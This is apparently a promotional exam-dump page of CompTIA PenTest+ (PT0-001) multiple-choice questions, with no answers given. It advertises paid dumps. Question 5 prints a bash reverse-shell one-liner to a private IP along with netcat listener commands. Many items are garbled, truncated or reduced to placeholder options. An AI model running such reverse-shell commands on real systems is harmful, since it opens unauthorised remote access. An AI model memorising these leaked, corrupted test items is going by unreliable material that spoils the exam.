We offers PT0-001 Free Practice Questions. "CompTIA PenTest+ Certification Exam", also known as PT0-001 exam, is a CompTIA Certification. This set of posts, Passing the PT0-001 exam with PT0-001 Exam Dumps, will help you answer those questions. The PT0-001 Dumps Questions covers all the knowledge points of the real exam. 100% real PT0-001 Exam Questions and revised by experts!
Check PT0-001 free dumps before getting the full version:
NEW QUESTION 1
A penetration test was performed by an on-staff technicians junior technician. During the test, the technician discovered the application could disclose an SQL table with user account and password information. Which of the following is the MOST effective way to notify management of this finding and its importance?
- A. Document Ihe findtngs with an executive summary, recommendations, and screenshots of the web apphcation disclosure.
- B. Connect to the SQL server using this information and change the password to one or two noncritical accounts to demonstrate a proof-of-concept to management.
- C. Notify the development team of the discovery and suggest that input validation be implementedon the web application's SQL query strings.
- D. Request that management create an RFP to begin a formal engagement with a professional penetration testing company.
NEW QUESTION 2
A tester has determined that null sessions are enabled on a domain controller. Which of the following attacks can be performed to leverage this vulnerability?
- A. RID cycling to enumerate users and groups
- B. Pass the hash to relay credentials
- C. Password brute forcing to log into the host
- D. Session hijacking to impersonate a system account
NEW QUESTION 3
A software development team recently migrated to new application software on the on-premises environment Penetration test findings show that multiple vulnerabilities exist If a penetration tester does not have access to a live or test environment, a test might be better to create the same environment on the VM Which of the following is MOST important for confirmation?
- A. Unsecure service and protocol configuration
- B. Running SMB and SMTP service
- C. Weak password complexity and user account
- D. Misconfiguration
NEW QUESTION 4
Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?
- A. To remove the persistence
- B. To enable penitence
- C. To report persistence
- D. To check for persistence
NEW QUESTION 5
A tester intends to run the following command on a target system:
bash -i >& /dev/tcp/10.2.4.6/443 0>&1
Which of the following additional commands would need to be executed on the tester's Linux system.o make (he pre*ous command success?
- A. nc -nvlp 443
- B. nc 10.2.4.6 443
- C. nc -w3 10.2.4.6 443
- D. nc-/bin/ah 10.2.4.6 443
NEW QUESTION 6
While prioritizing findings and recommendations for an executive summary, which of the following considerations would De MOST valuable to the client?
- A. Levels of difficulty to explogt identified vulnerabilities
- B. Time taken to accomplish each step
- C. Risk tolerance of the organization
- D. Availability of patches and remediations
NEW QUESTION 7
A. penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
- A. Option A
- B. Option B
- C. Option C
- D. Option D
NEW QUESTION 8
Click the exhibit button.
Given the Nikto vulnerability scan output shown in the exhibit, which of the following explogtation techniques might be used to explogt the target system? (Select TWO)
- A. Arbitrary code execution
- B. Session hijacking
- C. SQL injection
- D. Login credential brute-forcing
- E. Cross-site request forgery
NEW QUESTION 9
A client has voiced concern about the number of companies being branched by remote attackers, who are looking for trade secrets. Which of following BEST describes the types of adversaries this would identify?
- A. Script kiddies
- B. APT actors
- C. Insider threats
- D. Hacktrvist groups
NEW QUESTION 10
A penetration tester notices that the X-Frame-Optjons header on a web application is not set. Which of the following would a malicious actor do to explogt this configuration setting?
- A. Use path modification to escape the application's framework.
- B. Create a frame that overlays the application.
- D. Pass an iframe attribute that is maliciou
NEW QUESTION 11
A client asks a penetration tester to add more addresses to a test currently in progress. Which of the following would defined the target list?
- A. Rules of engagement
- B. Master services agreement
- C. Statement of work
- D. End-user license agreement
NEW QUESTION 12
A company planned for and secured the budget to hire a consultant to perform a web application penetration test. Upon discovered vulnerabilities, the company asked the consultant to perform the following tasks:
• Code review
• Updates to firewall setting
- A. Scope creep
- B. Post-mortem review
- C. Risk acceptance
- D. Threat prevention
NEW QUESTION 13
When performing compliance-based assessments, which of the following is the MOST important Key consideration?
- A. Additional rate
- B. Company policy
- C. Impact tolerance
- D. Industry type
NEW QUESTION 14
The results of a basic compliance scan show a subset of assets on a network. This data differs from what is shown on the network architecture diagram, which was supplied at the beginning of the test. Which of the following are the MOST likely causes for this difference? (Select TWO)
- A. Storage access
- B. Limited network access
- C. Misconfigured DHCP server
- D. Incorrect credentials
- E. Network access controls
NEW QUESTION 15
During a penetration test, a tester runs a phishing campaign and receives a shell from an internal PC running Windows 10 OS. The tester wants to perform credential harvesting with Mimikazt. Which of the following registry changes would allow for credential caching in memory?
- A. Option A
- B. Option B
- C. Option C
- D. Option D
NEW QUESTION 16
A penetration tester ran the following Nmap scan on a computer nmap -sV 192.168.1.5
The organization said it had disabled Telnet from its environment However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH Which of the following is the BEST explanation for what happened?
- A. The organization failed to disable Telnet.
- B. Nmap results contain a false positive for port 23.
- C. Port 22 was filtered.
- D. The service is running on a non-standard por
NEW QUESTION 17
A recently concluded penetration test revealed that a legacy web application is vulnerable lo SQL injection Research indicates that completely remediating the vulnerability would require an architectural change, and the stakeholders are not m a position to risk the availability of the application Under such circumstances, which of the following controls are low-effort, short-term solutions to minimize the SQL injection risk? (Select TWO).
- A. Identify and eliminate inline SQL statements from the code.
- B. Identify and eliminate dynamic SQL from stored procedures.
- C. Identify and sanitize all user inputs.
- D. Use a whitelist approach for SQL statements.
- E. Use a blacklist approach for SQL statements.
- F. Identify the source of malicious input and block the IP addres
NEW QUESTION 18
An attacker uses SET to make a copy of a company's cloud-hosted web mail portal and sends an email m to obtain the CEO s login credentials Which of the following types of attacks is this an example of?
- A. Elicitation attack
- B. Impersonation attack
- C. Spear phishing attack
- D. Drive-by download attack
P.S. Easily pass PT0-001 Exam with 131 Q&As Surepassexam Dumps & pdf Version, Welcome to Download the Newest Surepassexam PT0-001 Dumps: https://www.surepassexam.com/PT0-001-exam-dumps.html (131 New Questions)